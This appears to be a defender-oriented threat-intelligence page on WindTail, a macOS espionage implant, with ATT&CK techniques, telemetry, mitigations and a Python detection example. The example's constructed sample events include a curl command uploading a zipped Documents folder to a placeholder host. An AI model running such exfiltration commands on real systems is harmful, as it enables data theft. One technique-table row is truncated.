S0466: WindTail
Analyst context for executives and security teams
WindTail is a macOS surveillance implant associated in ATT&CK with Windshift. Its practical significance is that it combines stealth, discovery, collection, archiving, command execution, web-based communications, and exfiltration-related behaviors on macOS systems. For leaders, this is a reminder that Mac fleets need the same visibility, response planning, and data-loss monitoring as Windows and Linux environments.
Executive priority
Prioritize validation of macOS security coverage where sensitive users, executives, developers, or regulated data are present. The ATT&CK relationships point to behaviors that can affect confidentiality and incident scope decisions: automated collection, archiving, outbound transfer, masquerading, invalid code signatures, and cleanup through file deletion. Executives should ask whether SOC and IR teams can prove visibility into Mac endpoint activity, code-signing anomalies, archive creation, and outbound web or unencrypted protocol traffic.
Technical view
ATT&CK does not provide a detection section for WindTail, so coverage should be validated behaviorally. For macOS, defenders should test visibility across related techniques: Unix shell execution, Native API use, file and directory discovery, system time discovery, automated collection, archive creation via utility, encoded or compressed files, deobfuscation, masquerading including invalid code signatures, hidden windows, file deletion, web protocol command-and-control, and exfiltration over unencrypted non-C2 protocols. Detection engineering should correlate host behaviors with network egress rather than relying on a single malware indicator.
Likely telemetry
- macOS endpoint process execution and parent-child process relationships
- Shell command and script execution evidence
- File system activity including discovery, archive creation, encoded or compressed files, and deletion
- Code-signing validation status and application metadata for macOS binaries
- Endpoint security or EDR events for native API-driven behavior where available
Detection direction
- Baseline legitimate macOS administration, backup, compression, and developer workflows before alerting on archive utilities or shell activity.
- Prioritize suspicious combinations: invalid or misleading application identity, shell execution, file discovery, archive creation, and outbound web or unencrypted transfer.
- Review macOS binaries that appear legitimate but fail signature validation or have metadata inconsistent with their location or behavior.
- Correlate encoded or compressed artifacts with later deobfuscation, collection, deletion, or network transfer events.
- Tune for false positives from IT management tools, software installers, backup agents, and developer scripts, but require those tools to be known, signed, and expected in the environment.
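The correlation the bullets above describe, as an added example that is not part of the original page or of ATT&CK: it walks constructed macOS endpoint records, groups shell, archive and curl activity under their root application, and scores a chain higher when the root fails signature validation. Event field names and the sample records are assumptions.

```python
"""Correlate constructed macOS endpoint events into an archive-then-egress chain."""
from dataclasses import dataclass


@dataclass
class Event:
    ts: int          # seconds since epoch (constructed)
    pid: int
    ppid: int
    proc: str        # executable path reported by the sensor
    args: str
    sig: str = "valid"   # code-signing status as reported by the sensor


# Constructed sample telemetry: an app with a revoked signature spawns a shell,
# zips a home-directory folder and ships the archive with curl; a Terminal
# session that only zips a folder is benign noise.
SAMPLE = [
    Event(100, 10, 1, "/Applications/Quarterly.app/Contents/MacOS/Quarterly", "", "revoked"),
    Event(101, 11, 10, "/bin/sh", "-c date", "valid"),
    Event(102, 12, 10, "/usr/bin/zip", "-r /tmp/out.zip /Users/alice/Documents", "valid"),
    Event(103, 13, 10, "/usr/bin/curl", "-F file=@/tmp/out.zip http://example.invalid/up", "valid"),
    Event(200, 20, 1, "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "", "valid"),
    Event(201, 21, 20, "/usr/bin/zip", "-r backup.zip notes", "valid"),
]

# Which stage of the chain a given binary represents.
STAGES = {"/bin/sh": "shell", "/bin/bash": "shell", "/bin/zsh": "shell",
          "/usr/bin/zip": "archive", "/usr/bin/curl": "egress"}


def find_chains(events, window=600):
    """Return (root process, score) for roots whose descendants archive and egress within `window` s."""
    by_pid = {e.pid: e for e in events}

    def root_of(e):
        while e.ppid in by_pid:      # climb until the parent is outside our telemetry
            e = by_pid[e.ppid]
        return e

    chains = {}
    for e in events:
        stage = STAGES.get(e.proc)
        if stage is None:
            continue
        root = root_of(e)
        c = chains.setdefault(root.pid, {"root": root, "stages": {}, "first": e.ts})
        if e.ts - c["first"] <= window:
            c["stages"][stage] = e
    hits = []
    for c in chains.values():
        s = c["stages"]
        if "archive" in s and "egress" in s:
            # archive+egress is the base; a shell and a bad signature each add weight
            score = 2 + ("shell" in s) + (c["root"].sig != "valid")
            hits.append((c["root"].proc, score))
    return hits
```

The benign Terminal session never reaches a hit because it has no egress stage; baselining, as the first bullet recommends, would then decide which archive-only roots to ignore.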
Mitigation priorities
- Ensure macOS endpoints are included in managed detection, incident response playbooks, and evidence-retention requirements.
- Enforce application control and code-signing validation policies appropriate to the organization’s risk tolerance.
- Limit unnecessary outbound protocols and route web traffic through monitored controls where feasible.
- Apply least-privilege practices to reduce the data accessible to a compromised user context.
- Maintain endpoint logging for process, file, signature, and network activity long enough to support investigation of collection and exfiltration scenarios.
Analyst notes and limits
The strongest decision value comes from the relationships: WindTail is tied to macOS behaviors spanning stealth, execution, discovery, collection, command-and-control, and exfiltration. Because no official ATT&CK detection text is provided, this take emphasizes coverage validation and correlation of related behaviors rather than malware-specific signatures.
This assessment is limited to the supplied ATT&CK object, external references, and relationship context. ATT&CK lists the platform as macOS and does not specify tactics directly on the malware object or provide official detection guidance. Local asset inventory, logging configuration, and business data locations are required to determine actual exposure and coverage.
WindTail
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1036.001 | Invalid Code Signature (sub-technique) | WindTail has been incompletely signed with revoked certificates. [2] |
| Enterprise | T1106 | Native API | WindTail can invoke Apple APIs. |
| Enterprise | T1083 | File and Directory Discovery | WindTail has the ability to enumerate the user's home directory and the path to its own application bundle. [2][3] |
| Enterprise | T1027.013 | Encrypted/Encoded File (sub-technique) | WindTail can be delivered as a compressed, encrypted, and encoded payload. [3] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | WindTail has the ability to use HTTP for C2 communications. [3] |
| Enterprise | T1027.015 | Compression (sub-technique) | WindTail can be delivered as a compressed, encrypted, and encoded payload. [3] |
| Enterprise | T1059.004 | Unix Shell (sub-technique) | WindTail can use the |
| Enterprise | T1119 | Automated Collection | WindTail can identify and add files that possess specific file extensions to an array for archiving. [3] |
| Enterprise | T1036 | Masquerading | WindTail has used icons mimicking MS Office files to mask payloads. [2] |
| Enterprise | T1560.001 | Archive via Utility (sub-technique) | WindTail has the ability to use the macOS built-in zip utility to archive files. [3] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | WindTail has the ability to decrypt strings using hard-coded AES keys. [2] |
| Enterprise | T1070.004 | File Deletion (sub-technique) | WindTail has the ability to receive and execute a self-delete command. [3] |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol (sub-technique) | WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl. [3] |
| Enterprise | T1564.003 | Hidden Window (sub-technique) | WindTail can instruct the OS to execute an application without a dock icon or menu. [2] |
| Enterprise | T1124 | System Time Discovery | WindTail has the ability to generate the current date and time. [2] |
Groups, software, and campaigns
G0112: Windshift
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 5a55594600bd… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] SANS Windshift August 2018: Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024.
- [2] objective-see windtail1 dec 2018: Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019.
- [3] objective-see windtail2 jan 2019: Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.
- [4] mitre-attack S0466
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.